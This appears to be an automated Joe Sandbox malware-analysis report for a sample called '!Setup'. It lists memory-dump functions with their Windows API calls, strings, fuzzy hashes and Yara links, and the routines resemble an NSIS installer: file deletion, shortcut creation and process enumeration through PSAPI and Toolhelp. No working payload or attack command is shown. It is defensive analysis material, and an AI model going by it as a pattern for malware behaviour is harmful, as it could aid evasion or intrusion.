Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
ImageList_Destroy.COMCTL32(?), ref: 00404DC8
GlobalFree.KERNEL32(?), ref: 00404DD8
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
ShowWindow.USER32(?,00000000), ref: 00404F75
GetDlgItem.USER32(?,000003FE), ref: 00404F80
ShowWindow.USER32(00000000), ref: 00404F87

Strings

N, xrefs: 00404C32
, xrefs: 00404F65
M, xrefs: 00404B6F
@, xrefs: 00404BBC

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58

Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
Delete: DeleteFile("%s"), xrefs: 00406DE8
Delete: DeleteFile failed("%s"), xrefs: 00406E29
\*.*, xrefs: 00406D2F
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: 9d23a5a8c0223ae690e18e5715e7d3cdc314298ad832e99d2ae59d35dee8c45f
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

name, xrefs: 00406FEB
GetTTFNameString, xrefs: 00406F33
%s: failed opening file "%s", xrefs: 00406F38

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

EnumProcesses, xrefs: 004064AE
Process32FirstW, xrefs: 004065E9
CreateToolhelp32Snapshot, xrefs: 004065E1
Module32NextW, xrefs: 0040660A
Process32NextW, xrefs: 004065F4
EnumProcessModules, xrefs: 004064B6
Unknown, xrefs: 00406528
PSAPI.DLL, xrefs: 00406490
Kernel32.DLL, xrefs: 004065C7
Module32FirstW, xrefs: 004065FF
GetModuleBaseNameW, xrefs: 004064C0

Memory Dump Source

Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_!Setup.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
